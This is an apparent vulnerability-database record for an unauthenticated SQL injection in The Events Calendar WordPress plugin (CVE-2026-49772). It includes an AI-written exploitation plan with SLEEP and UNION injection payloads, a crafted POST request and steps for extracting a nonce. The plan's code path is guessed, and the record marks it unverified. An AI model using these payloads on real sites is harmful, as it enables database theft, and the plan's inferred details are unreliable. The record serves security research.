[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHWxq8zMmtd8PeetbWmto0af3FMmAQug6iW5vSsO6oWo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-49772","the-events-calendar-unauthenticated-sql-injection-3","The Events Calendar  6.15.12-6.16.2 - Unauthenticated SQL Injection","The The Events Calendar plugin for WordPress is vulnerable to SQL Injection in versions up to 6.15.12-6.16.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","the-events-calendar",null,">=6.15.12 \u003C=6.16.2","6.16.3","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-08 00:00:00","2026-06-15 19:40:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc2a3076b-f5dc-4d93-b0a5-7121ba4e529a?source=api-prod",8,[22,23,24,25,26,27,28,29],"build\u002Fjs\u002Fviews\u002Fcategory-color-selector.asset.php","build\u002Fjs\u002Fviews\u002Fcategory-color-selector.js","changelog.md","common\u002Flang\u002Ftribe-common.pot","common\u002Fsrc\u002FCommon\u002FIntegrations\u002FHarbor\u002FPUE.php","common\u002Fsrc\u002FCommon\u002FREST\u002FTEC\u002FV1\u002FAbstracts\u002FParameter.php","common\u002Fsrc\u002FTribe\u002FMain.php","common\u002Fvendor\u002Fautoload.php","researched",false,3,"This exploitation research plan is designed to guide an automated security agent in verifying **CVE-2026-49772**, a SQL injection vulnerability in **The Events Calendar** plugin.\n\n### 1. Vulnerability Summary\n*   **Vulnerability Type:** Unauthenticated SQL Injection (Union-Based or Time-Based).\n*   **Affected Component:** The V2 Views REST API endpoint (`tribe\u002Fviews\u002Fv2\u002Fhtml`).\n*   **Vulnerable Versions:** 6.15.12 to 6.16.2.\n*   **Cause:** The plugin processes the `view_data` parameter (specifically category filters) without utilizing `$wpdb->prepare()` or adequate sanitization before incorporating the values into an internal SQL query used to determine category-specific styling (Category Colors) or event filtering.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Ftribe\u002Fviews\u002Fv2\u002Fhtml`\n*   **HTTP Method:** `POST` (typically used by the V2 Views system to update the calendar display).\n*   **Vulnerable Parameter:** `view_data[categories]` or `view_data[tribe_event_category]`.\n*   **Authentication:** Unauthenticated. The V2 Views API is public by design to support AJAX-driven calendar navigation for visitors.\n*   **Preconditions:** The \"Category Colors\" feature must be active, or the view must be filtering by a category.\n\n### 3. Code Flow (Trace)\n1.  **Entry Point:** An unauthenticated user sends a `POST` request to `\u002Fwp-json\u002Ftribe\u002Fviews\u002Fv2\u002Fhtml`.\n2.  **REST Dispatch:** The request is handled by `TEC\\Events\\Views\\V2\\Rest_Endpoints\\Html_Endpoint` (inferred).\n3.  **Data Processing:** The `view_data` array is extracted from the request.\n4.  **Vulnerable Sink:** The backend logic for rendering the \"Category Color Selector\" (referenced in `build\u002Fjs\u002Fviews\u002Fcategory-color-selector.js`) or the main event query retrieves category metadata. If the plugin attempts to fetch the color associated with the requested categories, it likely executes a query similar to:\n    `SELECT * FROM wp_options WHERE option_name LIKE 'tribe_category_color_%' AND option_value IN ('\" . $category_id . \"')`\n5.  **SQL Injection:** Because `$category_id` (derived from `view_data`) is concatenated without escaping, an attacker can break out of the string and append SQL commands.\n\n### 4. Nonce Acquisition Strategy\nWhile many REST endpoints are protected by `_wpnonce`, the public Views API often permits unauthenticated access. However, if a nonce is required for the `v2\u002Fhtml` endpoint, follow this strategy:\n\n1.  **Identify Trigger:** The \"Category Color Selector\" script is localized when the Events page is loaded.\n2.  **Setup Test Page:** Create a standard events page.\n    *   Command: `wp post create --post_type=page --post_title=\"Calendar\" --post_status=publish --post_content='[tribe_events]'`\n3.  **Navigate:** Use `browser_navigate` to the new page.\n4.  **Extract Nonce:** The V2 Views system localizes data into a JavaScript object.\n    *   Agent Command: `browser_eval(\"window.tribe_events_views_v2_vars?.rest_nonce || window.wpApiSettings?.nonce\")`\n5.  **Note:** The action string used in the backend for this nonce is typically `'wp_rest'`.\n\n### 5. Exploitation Strategy\nThe agent should perform the following steps using the `http_request` tool:\n\n*   **Step 1: Confirm Injection (Time-Based)**\n    Submit a payload designed to cause a noticeable delay.\n    *   **Payload:** `1') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n    *   **Request:**\n        ```http\n        POST \u002Fwp-json\u002Ftribe\u002Fviews\u002Fv2\u002Fhtml\n        Content-Type: application\u002Fx-www-form-urlencoded\n\n        view=list&view_data[categories][0]=1') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\n        ```\n*   **Step 2: Data Extraction (Union-Based)**\n    If the endpoint returns HTML containing category information, attempt to leak the database version.\n    *   **Payload:** `1') UNION SELECT 1,version(),3,4,5,6,7-- -` (Adjust column count as needed).\n\n### 6. Test Data Setup\nTo ensure the code path is hit:\n1.  **Create Categories:**\n    *   `wp term create event_category \"Security\" --slug=security`\n2.  **Create Event:** Create at least one event assigned to that category.\n    *   `wp post create --post_type=tribe_events --post_title=\"Research Symposium\" --post_status=publish`\n    *   `wp post term set [POST_ID] security event_category`\n3.  **Enable Feature:** Ensure V2 Views are enabled in Events -> Settings.\n\n### 7. Expected Results\n*   **Successful Injection:** The server response time will exceed 5 seconds when the `SLEEP(5)` payload is sent.\n*   **Failed Attempt:** The server returns a `200 OK` or `400 Bad Request` almost immediately (under 1 second), or the response contains a SQL error if `WP_DEBUG` is enabled.\n\n### 8. Verification Steps\nAfter the HTTP request, verify the vulnerability by auditing the database logs:\n1.  **Enable Query Logging:** `wp eval \"global \\$wpdb; \\$wpdb->query('SET GLOBAL general_log = 1');\"`\n2.  **Check Log:** Inspect the MySQL general log to see the literal string including the `SLEEP` command being executed.\n3.  **Version Check:** Confirm the installed version is between 6.15.12 and 6.16.2.\n\n### 9. Alternative Approaches\n*   **Parameter Variation:** If `view_data[categories]` is sanitized, test the `url` parameter. The V2 Views system often parses the `url` parameter to reconstruct the view state.\n    *   **Example:** `POST \u002Fwp-json\u002Ftribe\u002Fviews\u002Fv2\u002Fhtml?url=\u002Fevents\u002Fcategory\u002Fsecurity') AND SLEEP(5)-- -\u002F`\n*   **Shortcode Injection:** If the REST API is hardened, test the same parameters via the `[tribe_events]` shortcode if it supports AJAX pagination.","The Events Calendar plugin (6.15.12-6.16.2) is vulnerable to an unauthenticated SQL injection via the tribe\u002Fviews\u002Fv2\u002Fhtml REST API endpoint. The vulnerability arises from insufficient sanitization and a lack of SQL preparation when processing category filters within the view_data parameter, allowing for the extraction of sensitive database information.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.2\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.3\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.2\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.asset.php\t2026-01-13 18:12:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.3\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.asset.php\t2026-05-28 20:50:40.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array(), 'version' => '3596e03221d71f8c2785');\n+\u003C?php return array('dependencies' => array(), 'version' => '52b904c19ce12a16e6e9');\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.2\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.3\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.2\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.js\t2026-01-13 18:12:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthe-events-calendar\u002F6.16.3\u002Fbuild\u002Fjs\u002Fviews\u002Fcategory-color-selector.js\t2026-05-28 20:50:40.000000000 +0000\n@@ -1 +1 @@\n-window.tribe=window.tribe||{},window.tribe.events=window.tribe.events||{},window.tribe.events.categoryColors=window.tribe.events.categoryColors||{},tribe.events.categoryColors.categoryPicker=function(){...}\n+window.tribe=window.tribe||{},window.tribe.events=window.tribe.events||{},window.tribe.events.categoryColors=window.tribe.events.categoryColors||{},tribe.events.categoryColors.categoryPicker=function(){...}\n... (truncated)","The exploit targets the public V2 Views REST API. An unauthenticated attacker sends a POST request to `\u002Fwp-json\u002Ftribe\u002Fviews\u002Fv2\u002Fhtml`. The payload is placed within the `view_data[categories]` or `view_data[tribe_event_category]` parameter, which is improperly handled when the plugin generates SQL to filter events or determine category-specific styling (such as colors). By including a SQL injection payload like `1') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`, an attacker can break out of the intended query and execute arbitrary commands. This is typically achieved using time-based techniques to confirm the vulnerability and extract data.","gemini-3-flash-preview","2026-06-26 02:31:32","2026-06-26 02:32:51",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","6.16.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-events-calendar\u002Ftags\u002F6.16.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-events-calendar.6.16.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-events-calendar\u002Ftags\u002F6.16.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-events-calendar.6.16.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-events-calendar\u002Ftags"]